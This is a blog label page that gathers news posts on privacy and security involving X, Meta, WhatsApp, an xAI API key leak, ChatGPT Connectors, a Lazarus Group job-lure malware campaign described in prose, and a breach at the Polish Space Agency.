Search This Blog

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Showing posts with label X. Show all posts

User Privacy:Is WhatsApp Not Safe to Use?


WhatsApp allegedly collects data

The mega-messenger from Meta is allegedly collecting user data to generate ad money, according to recent attacks on WhatsApp. WhatsApp strongly opposes these fresh accusations, but it didn't help that a message of its own appeared to imply the same.  

The allegations 

There are two prominent origins of the recent attacks. Few experts are as well-known as Elon Musk, particularly when it occurs on X, the platform he owns. Musk asserted on the Joe Rogan Experience that "WhatsApp knows enough about what you're texting to know what ads to show you." "That is a serious security flaw."

These so-called "hooks for advertising" are typically thought to rely on metadata, which includes information on who messages whom, when, and how frequently, as well as other information from other sources that is included in a user's profile.  

End-to-end encryption 

The message content itself is shielded by end-to-end encryption, which is the default setting for all 3 billion WhatsApp users. Signal's open-source encryption protocol, which the Meta platform adopted and modified for its own use, is the foundation of WhatsApp's security. So, in light of these new attacks, do you suddenly need to stop using WhatsApp?

In reality, WhatsApp's content is completely encrypted. There has never been any proof that Meta, WhatsApp, or anybody else can read the content itself. However, the platform you are utilizing is controlled by Meta, and it is aware of your identity. It does gather information on how you use the platform.  

How user data is used 

Additionally, it shares information with Meta so that it can "show relevant offers/ads." Signal has a small portion of WhatsApp's user base, but it does not gather metadata in the same manner. Think about using Signal instead for sensitive content. Steer clear of Telegram since it is not end-to-end encrypted and RCS because it is not yet cross-platform encrypted.

Remember that end-to-end encryption only safeguards your data while it is in transit. It has no effect on the security of your content on the device. I can read all of your messages, whether or not they are end-to-end encrypted, if I have control over your iPhone or Android.

Meta's Platforms Rank Worst in Social Media Privacy Rankings: Report

Meta’s Instagram, WhatsApp, and Facebook have once again been flagged as the most privacy-violating social media apps. According to Incogni’s Social Media Privacy Ranking report 2025, Meta and TikTok are at the bottom of the list. Elon Musk’s X (formerly Twitter) has also received poor rankings in various categories, but has done better than Meta in a few categories.

Discord, Pinterest, and Quora perform well

The report analyzed 15 of the most widely used social media platforms globally, measuring them against 14 privacy criteria organized into six different categories: AI data use, user control, ease of access, regulatory transgressions, transparency, and data collection. The research methodology focused on how an average user could understand and control privacy policies.

Discord, Pinterest, and Quora have done best in the 2025 ranking. Discord is placed first, thanks to its stance on not giving user data for training of AI models. Pinterest ranks second, thanks to its strong user options and fewer regulatory penalties. Quora came third thanks to its limited user data collection.

Why were Meta platforms penalized?

But the Meta platforms were penalized strongly in various categories. Facebook was penalized for frequent regulatory fines, such as GDPR rules in Europe, and penalties in the US and other regions. Instagram and WhatsApp received heavy penalties due to policies allowing the collection of sensitive personal data, such as sexual orientation and health. X faced penalties for vast data collection

Penalties against X

X was penalized for vast data collection and privacy fines from the past, but it still ranked above Meta and TikTok in some categories. X was among the easiest platforms to delete accounts from, and also provided information to government organizations at was lower rate than other platforms. Yet, X allows user data to be trained for AI models, which has impacted its overall privacy score.

“One of the core principles motivating Incogni’s research here is the idea that consent to have personal information gathered and processed has to be properly informed to be valid and meaningful. It’s research like this that arms users with not only the facts but also the tools to inform their choices,” Incogni said in its blog. 

Sensitive AI Key Leak : A Wave of Security Concerns in U.S. Government Circles

 




A concerning security mistake involving a U.S. government employee has raised alarms over how powerful artificial intelligence tools are being handled. A developer working for the federal Department of Government Efficiency (DOGE) reportedly made a critical error by accidentally sharing a private access key connected to xAI, an artificial intelligence company linked to Elon Musk.

The leak was first reported after a programming script uploaded to GitHub, a public code-sharing platform, was found to contain login credentials tied to xAI’s system. These credentials reportedly unlocked access to at least 52 of the company’s internal AI models including Grok-4, one of xAI’s most advanced tools, similar in capacity to OpenAI’s GPT-4.

The employee, identified in reports as 25-year-old Marko Elez, had top-level access to various government platforms and databases. These include systems used by sensitive departments such as Homeland Security, the Justice Department, and the Social Security Administration.

The key remained active and publicly visible for a period of time before being taken down. This has sparked concerns that others may have accessed or copied the credentials while they were exposed.


Why It Matters

Security experts say this isn’t just a one-off mistake, it’s a sign that powerful AI systems may be handled too carelessly, even by insiders with government clearance. If the leaked key had been misused before removal, bad actors could have gained access to internal tools or extracted confidential data.

Adding to the concern, xAI has not yet issued a public response, and there’s no confirmation that the key has been fully disabled.

The leak also brings attention to DOGE’s track record. The agency, reportedly established to improve government tech systems, has seen past incidents involving poor internal cybersecurity practices. Elez himself has been previously linked to issues around unprofessional behavior online and mishandling of sensitive information.

Cybersecurity professionals say this breach is another reminder of the risks tied to mixing government projects with fast-moving private AI ventures. Philippe Caturegli, a cybersecurity expert, said the leak raises deeper questions about how sensitive data is managed behind closed doors.


What Comes Next

While no immediate harm to the public has been reported, the situation highlights the need for stricter rules around how digital credentials are stored, especially when dealing with cutting-edge AI technologies.

Experts are calling for better oversight, stronger internal protocols, and more accountability when it comes to government use of private AI tools.

For now, this case serves as a cautionary tale: even one small error like uploading a file without double-checking its contents can open up major vulnerabilities in systems meant to be secure.

OpenAI Rolls Out Premium Data Connections for ChatGPT Users


The ChatGPT solution has become a transformative artificial intelligence solution widely adopted by individuals and businesses alike seeking to improve their operations. Developed by OpenAI, this sophisticated artificial intelligence platform has been proven to be very effective in assisting users with drafting compelling emails, developing creative content, or conducting complex data analysis by streamlining a wide range of workflows. 

OpenAI is continuously enhancing ChatGPT's capabilities through new integrations and advanced features that make it easier to integrate into the daily workflows of an organisation; however, an understanding of the platform's pricing models is vital for any organisation that aims to use it efficiently on a day-to-day basis. A business or an entrepreneur in the United Kingdom that is considering ChatGPT's subscription options may find that managing international payments can be an additional challenge, especially when the exchange rate fluctuates or conversion fees are hidden.

In this context, the Wise Business multi-currency credit card offers a practical solution for maintaining financial control as well as maintaining cost transparency. This payment tool, which provides companies with the ability to hold and spend in more than 40 currencies, enables them to settle subscription payments without incurring excessive currency conversion charges, which makes it easier for them to manage budgets as well as adopt cutting-edge technology. 

A suite of premium features has been recently introduced by OpenAI that aims to enhance the ChatGPT experience for subscribers by enhancing its premium features. There is now an option available to paid users to use advanced reasoning models that include O1 and O3, which allow users to make more sophisticated analytical and problem-solving decisions. 

The subscription comes with more than just enhanced reasoning; it also includes an upgraded voice mode that makes conversational interactions more natural, as well as improved memory capabilities that allow the AI to retain context over the course of a long period of time. It has also been enhanced with the addition of a powerful coding assistant designed to help developers automate workflows and speed up the software development process. 

To expand the creative possibilities even further, OpenAI has adjusted token limits, which allow for greater amounts of input and output text and allow users to generate more images without interruption. In addition to expedited image generation via a priority queue, subscribers have the option of achieving faster turnaround times during high-demand periods. 

In addition to maintaining full access to the latest models, paid accounts are also provided with consistent performance, as they are not forced to switch to less advanced models when server capacity gets strained-a limitation that free users may still have to deal with. While OpenAI has put in a lot of effort into enriching the paid version of the platform, the free users have not been left out. GPT-4o has effectively replaced the older GPT-4 model, allowing complimentary accounts to take advantage of more capable technology without having to fall back to a fallback downgrade. 

In addition to basic imaging tools, free users will also receive the same priority in generation queues as paid users, although they will also have access to basic imaging tools. With its dedication to making AI broadly accessible, OpenAI has made additional features such as ChatGPT Search, integrated shopping assistance, and limited memory available free of charge, reflecting its commitment to making AI accessible to the public. 

ChatGPT's free version continues to be a compelling option for people who utilise the software only sporadically-perhaps to write occasional emails, research occasionally, and create simple images. In addition, individuals or organisations who frequently run into usage limits, such as waiting for long periods of time for token resettings, may find that upgrading to a paid plan is an extremely beneficial decision, as it unlocks uninterrupted access as well as advanced capabilities. 

In order to transform ChatGPT into a more versatile and deeply integrated virtual assistant, OpenAI has introduced a new feature, called Connectors, which is designed to transform the platform into an even more seamless virtual assistant. It has been enabled by this new feature for ChatGPT to seamlessly interface with a variety of external applications and data sources, allowing the AI to retrieve and synthesise information from external sources in real time while responding to user queries. 

With the introduction of Connectors, the company is moving forward towards providing a more personal and contextually relevant experience for our users. In the case of an upcoming family vacation, for example, ChatGPT can be instructed by users to scan their Gmail accounts in order to compile all correspondence regarding the trip. This allows users to streamline travel plans rather than having to go through emails manually. 

With its level of integration, Gemini is similar to its rivals, which enjoy advantages from Google's ownership of a variety of popular services such as Gmail and Calendar. As a result of Connectors, individuals and businesses will be able to redefine how they engage with AI tools in a new way. OpenAI intends to create a comprehensive digital assistant by giving ChatGPT secure access to personal or organisational data that is residing across multiple services, by creating an integrated digital assistant that anticipates needs, surfaces critical insights, streamlines decision-making processes, and provides insights. 

There is an increased demand for highly customised and intelligent assistance, which is why other AI developers are likely to pursue similar integrations to remain competitive. The strategy behind Connectors is ultimately to position ChatGPT as a central hub for productivity — an artificial intelligence that is capable of understanding, organising, and acting upon every aspect of a user’s digital life. 

In spite of the convenience and efficiency associated with this approach, it also illustrates the need to ensure that personal information remains protected while providing robust data security and transparency in order for users to take advantage of these powerful integrations as they become mainstream. In its official X (formerly Twitter) account, OpenAI has recently announced the availability of Connectors that can integrate with Google Drive, Dropbox, SharePoint, and Box as part of ChatGPT outside of the Deep Research environment. 

As part of this expansion, users will be able to link their cloud storage accounts directly to ChatGPT, enabling the AI to retrieve and process their personal and professional data, enabling it to create responses on their own. As stated by OpenAI in their announcement, this functionality is "perfect for adding your own context to your ChatGPT during your daily work," highlighting the company's ambition of making ChatGPT more intelligent and contextually aware. 

It is important to note, however, that access to these newly released Connectors is confined to specific subscriptions and geographical restrictions. A ChatGPT Pro subscription, which costs $200 per month, is exclusive to ChatGPT Pro subscribers only and is currently available worldwide, except for the European Economic Area (EEA), Switzerland and the United Kingdom. Consequently, users whose plans are lower-tier, such as ChatGPT Plus subscribers paying $20 per month, or who live in Europe, cannot use these integrations at this time. 

Typically, the staggered rollout of new technologies is a reflection of broader challenges associated with regulatory compliance within the EU, where stricter data protection regulations as well as artificial intelligence governance frameworks often delay their availability. Deep Research remains relatively limited in terms of the Connectors available outside the company. However, Deep Research provides the same extensive integration support as Deep Research does. 

In the ChatGPT Plus and Pro packages, users leveraging Deep Research capabilities can access a much broader array of integrations — for example, Outlook, Teams, Gmail, Google Drive, and Linear — but there are some restrictions on regions as well. Additionally, organisations with Team plans, Enterprise plans, or Educational plans have access to additional Deep Research features, including SharePoint, Dropbox, and Box, which are available to them as part of their Deep Research features. 

Additionally, OpenAI is now offering the Model Context Protocol (MCP), a framework which allows workspace administrators to create customised Connectors based on their needs. By integrating ChatGPT with proprietary data systems, organizations can create secure, tailored integrations, enabling highly specialized use cases for internal workflows and knowledge management that are highly specialized. 

With the increasing adoption of artificial intelligence solutions by companies, it is anticipated that the catalogue of Connectors will rapidly expand, offering users the option of incorporating external data sources into their conversations. The dynamic nature of this market underscores that technology giants like Google have the advantage over their competitors, as their AI assistants, such as Gemini, can be seamlessly integrated throughout all of their services, including the search engine. 

The OpenAI strategy, on the other hand, relies heavily on building a network of third-party integrations to create a similar assistant experience for its users. It is now generally possible to access the new Connectors in the ChatGPT interface, although users will have to refresh their browsers or update the app in order to activate the new features. 

As AI-powered productivity tools continue to become more widely adopted, the continued growth and refinement of these integrations will likely play a central role in defining the future of AI-powered productivity tools. A strategic approach is recommended for organisations and professionals evaluating ChatGPT as generative AI capabilities continue to mature, as it will help them weigh the advantages and drawbacks of deeper integration against operational needs, budget limitations, and regulatory considerations that will likely affect their decisions.

As a result of the introduction of Connectors and the advanced subscription tiers, people are clearly on a trajectory toward more personalised and dynamic AI assistance, which is able to ingest and contextualise diverse data sources. As a result of this evolution, it is also becoming increasingly important to establish strong frameworks for data governance, to establish clear controls for access to the data, and to ensure adherence to privacy regulations.

If companies intend to stay competitive in an increasingly automated landscape by investing early in these capabilities, they can be in a better position to utilise the potential of AI and set clear policies that balance innovation with accountability by leveraging the efficiencies of AI in the process. In the future, the organisations that are actively developing internal expertise, testing carefully selected integrations, and cultivating a culture of responsible AI usage will be the most prepared to fully realise the potential of artificial intelligence and to maintain a competitive edge for years to come.

Lazarus Gang Targets Job Seekers to Install Malware

Lazarus Gang Targets Job Seekers to Install Malware

North Korean hackers responsible for Contagious Interview are trapping job seekers in the cryptocurrency sector by using the popular ClickFix social-engineering attack strategy. They aimed to deploy a Go-based backdoor— earlier undocumented— known as GolangGhost on Windows and macOS systems. 

Hackers lure job seekers

The latest attack, potentially a part of a larger campaign, goes by the codename ClickFake Interview, according to French cybersecurity company Sekoia. Aka DeceptiveDeployment, DEV#POPPER, and Famoys Chollima; Contagious Interview has been active since December 2022, however, it was publicly reported only after late 2023. 

The attack uses legitimate job interview sites to promote the ClickFix tactic and deploy Windows and MacOS backdoors, said Sekoia experts Amaury G., Coline Chavane, and Felix Aimé, attributing the attack to the notorious Lazarus Group. 

Lazarus involved

One major highlight of the campaign is that it mainly attacks centralized finance businesses by mimicking firms like Kraken, Circle BlockFi, Coinbase, KuCoin, Robinhood, Tether, and Bybit. Traditionally, Lazarus targeted decentralized finance (DeFi) entities. 

Attack tactic explained

Like Operation Dream Job, Contagious Interview also uses fake job offers as traps to lure potential victims and trick them into downloading malware to steal sensitive data and cryptocurrency. The victims are approached via LinkedIn or X to schedule a video interview and asked to download malware-laced video conference software that triggers the infection process. 

Finding of Lazarus ClickFix attack

Security expert Tayloar Monahan first reported the Lazarus Group’s use of ClickFix in late 2022, saying the attack chains led to the installment of a malware strain called FERRET that delivered the Golang backdoor. In this malware campaign, the victims are prompted to use a video interview, ‘Willow,’ and do a sell video assessment. 

The whole process is carefully built to gain users and “proceeds smoothly until the user is asked to enable their camera,” Sekoia said. At this stage, an “error message appears, indicating that the user needs to download a driver to fix the issue. This is where the operator employs the ClickFix technique," adds Sekoia. 

Different attack tactics for Windows and MacOS users

The prompts given to victims may vary depending on the OS. For Windows, victims are asked to open the Command Prompt and run a curl command to perform a Visual Basic Script (VBS) file to launch a basic script to run GolanGhost. MacOS victims are prompted to open the Terminal app and perform a curl command to run a malicious shell script, which then runs another shell script that runs a stealer module called FROSTYFERRET—aka ChromwUpdateAlert— and the backdoor. 

Polish Space Agency "POLSA" Suffers Breach; System Offline

Polish Space Agency "POLSA" Suffers Breach; System Offline

Systems offline to control breach

The Polish Space Agency (POLSA) suffered a cyberattack last week, it confirmed on X. The agency didn’t disclose any further information, except that it “immediately disconnected” the agency network after finding that the systems were hacked. The social media post indicates the step was taken to protect data. 

US News said “Warsaw has repeatedly accused Moscow of attempting to destabilise Poland because of its role in supplying military aid to its neighbour Ukraine, allegations Russia has dismissed.” POLSA has been offline since to control the breach of its IT infrastructure. 

Incident reported to authorities

After discovering the attack, POLSA reported the breach to concerned authorities and started an investigation to measure the impact. Regarding the cybersecurity incident, POLSA said “relevant services and institutions have been informed.”  

POLSA didn’t reveal the nature of the security attack and has not attributed the breach to any attacker. "In order to secure data after the hack, the POLSA network was immediately disconnected from the Internet. We will keep you updated."

How did the attack happen?

While no further info has been out since Sunday, internal sources told The Register that the “attack appears to be related to an internal email compromise” and that the staff “are being told to use phones for communication instead.”

POLSA is currently working with the Polish Military Computer Security Incident Response Team (CSIRT MON) and the Polish Computer Security Incident Response Team (CSIRT NASK) to patch affected services. 

Who is responsible?

Commenting on the incident, Poland's Minister of Digital Affairs, Krzysztof Gawkowski, said the “systems under attack were secured. CSIRT NASK, together with CSIRT MON, supports POLSA in activities aimed at restoring the operational functioning of the Agency.” On finding the source, he said, “Intensive operational activities are also underway to identify who is behind the cyberattack. We will publish further information on this matter on an ongoing basis.”

About POLSA

A European Space Agency (ESA) member, POLSA was established in September 2014. It aims to support the Polish space industry and strengthen Polish defense capabilities via satellite systems. The agency also helps Polish entrepreneurs get funds from ESA and also works with the EU, other ESA members and countries on different space exploration projects.  

Social Media Content Fueling AI: How Platforms Are Using Your Data for Training

 

OpenAI has admitted that developing ChatGPT would not have been feasible without the use of copyrighted content to train its algorithms. It is widely known that artificial intelligence (AI) systems heavily rely on social media content for their development. In fact, AI has become an essential tool for many social media platforms.

For instance, LinkedIn is now using its users’ resumes to fine-tune its AI models, while Snapchat has indicated that if users engage with certain AI features, their content might appear in advertisements. Despite this, many users remain unaware that their social media posts and photos are being used to train AI systems.

Social Media: A Prime Resource for AI Training

AI companies aim to make their models as natural and conversational as possible, with social media serving as an ideal training ground. The content generated by users on these platforms offers an extensive and varied source of human interaction. Social media posts reflect everyday speech and provide up-to-date information on global events, which is vital for producing reliable AI systems.

However, it's important to recognize that AI companies are utilizing user-generated content for free. Your vacation pictures, birthday selfies, and personal posts are being exploited for profit. While users can opt out of certain services, the process varies across platforms, and there is no assurance that your content will be fully protected, as third parties may still have access to it.

How Social Platforms Are Using Your Data

Recently, the United States Federal Trade Commission (FTC) revealed that social media platforms are not effectively regulating how they use user data. Major platforms have been found to use personal data for AI training purposes without proper oversight.

For example, LinkedIn has stated that user content can be utilized by the platform or its partners, though they aim to redact or remove personal details from AI training data sets. Users can opt out by navigating to their "Settings and Privacy" under the "Data Privacy" section. However, opting out won’t affect data already collected.

Similarly, the platform formerly known as Twitter, now X, has been using user posts to train its chatbot, Grok. Elon Musk’s social media company has confirmed that its AI startup, xAI, leverages content from X users and their interactions with Grok to enhance the chatbot’s ability to deliver “accurate, relevant, and engaging” responses. The goal is to give the bot a more human-like sense of humor and wit.

To opt out of this, users need to visit the "Data Sharing and Personalization" tab in the "Privacy and Safety" settings. Under the “Grok” section, they can uncheck the box that permits the platform to use their data for AI purposes.

Regardless of the platform, users need to stay vigilant about how their online content may be repurposed by AI companies for training. Always review your privacy settings to ensure you’re informed and protected from unintended data usage by AI technologies

X Confronts EU Legal Action Over Alleged AI Privacy Missteps

 


X, the artificial intelligence technology company of Elon Musk, has reportedly been accused of unlawfully feeding personal information about its users to its artificial intelligence technology without their consent according to a privacy campaign group based in Vienna. This complaint has been filed by a group of individuals known as Noyb.

In early September, Ireland's Data Protection Commission (DPC) filed a lawsuit against X over its data collection practices to train its artificial intelligence systems. A series of privacy complaints against X, the company formerly known as Twitter, have been filed after it was revealed the platform was using data obtained from European users to train an artificial intelligence chatbot for its Grok AI product without their consent. 

In the past couple of weeks, a social media user discovered that X had begun quietly processing the posts of regional users for AI training purposes late last month. In response to the revelation, TechCrunch reported that the Irish Data Protection Commission (DPC), responsible for ensuring that X complies with the General Data Protection Regulation (GDPR), expressed "surprise" at the revelation. As Musk's company, X has recently announced, all its users can choose whether Grok can access their public posts, the website's artificial intelligence chatbot that is operated by Musk's company X. 

If a user wishes to opt out of receiving communications from them, he or she must uncheck a box in their privacy settings. Despite this, Judge Leonie Reynolds observed that it appeared clear that X had begun processing its EU users' data to train its AI systems on May 7 only to offer the option to opt out from July 16. Additionally, she added, that not all users had access to the feature when it was first introduced. 

 An organization called NOYB has filed several lawsuits against X on behalf of consumers, a long-standing thorn in Big Tech's side and a persistent privacy activist group. Max Schrems, the head of NOYB, is a privacy activist who successfully challenged Meta's transfer of EU data to the US as violating the EU's stringent GDPR laws in a lawsuit he filed against Meta in 2017. As a result of this case, Meta has been fined €1.2 billion as well as faced logistical challenges, in June, due to complaints from NOYB, Meta was forced to pause the use of EU users’ data to train the AI systems it has since developed. 

There is another issue that NOYB wants to address. They argue that X did not obtain the consent of European Union users before using their data to teach Grok to train Grok. It has been reported that NOYB's spokesperson has told The Daily Upside that the company may find itself facing a fine of up to 4% of its annual revenue as a result of these complaints. Additionally, the punitive measures would also aggravate the situation, as X has a lot less money to play with than Meta does:  

It should be noted that X is no longer a publicly traded company, so this means that it is difficult to determine how its cash reserves are doing. However, people know that Musk bought the company in 2022, and when he bought it, it took on roughly $25 billion in debt with a very high leverage ratio.  In the years since the deal was made, the banks that helped finance the transaction have had an increasingly difficult time unloading their shares of the debt, and Fidelity has recently announced a discount on its stake, which gives a hint as to how the firm might be valued. 

As of last March, Fidelity's stake had dropped to a value of 67% less than it was when the company acquired the company. Although Musk was the one who bought Twitter, even before he acquired Twitter, the company had struggled to remain consistently profitable for many years as it was a small fish in a big tech pond. 

A key goal of NOYB is to conduct a full-scale investigation into how X was able to train its generative artificial intelligence model, Grok, without any consultation with its users to achieve a better understanding of what they did. Companies that interact directly with end users only need to display them with a yes/no prompt before using their contact information, Schrems told The Information. There are many other things they do this for regularly, so it would be very possible to train AI in this manner as well. 

The Grok2 beta is scheduled to be released on January 1st 2024, and this legal action comes only a few days before Grok 2 is set to launch its beta version. In the last few years, major tech companies have faced ethical challenges associated with the training of large amounts of data. It was widely reported in June 2024 that Meta was suing 11 European countries over its new privacy policies, which showed the company's intent to use the data generated by each account to train a machine learning algorithm upon the data. 

As a result of this particular case, the GDPR is intended to protect European citizens against unexpected uses of their data, such as those that could affect their right to privacy and their freedom to be free from intrusion. Noyb contends that X's use of a legitimate interest as a legal basis for its data collection and use may not be valid. The company cites a ruling by the top court of Europe last summer, which held that user consent is mandatory for similar cases involving data usage to target ads. 

The report outlines further concerns that providers of generative AI systems are frequently claiming they are unable to comply with other key GDPR requirements, such as the right to be forgotten, or the right to access personal data that has been collected. OpenAI's ChatGPT is also being widely criticized for many of the same concerns specifically related to GDPR.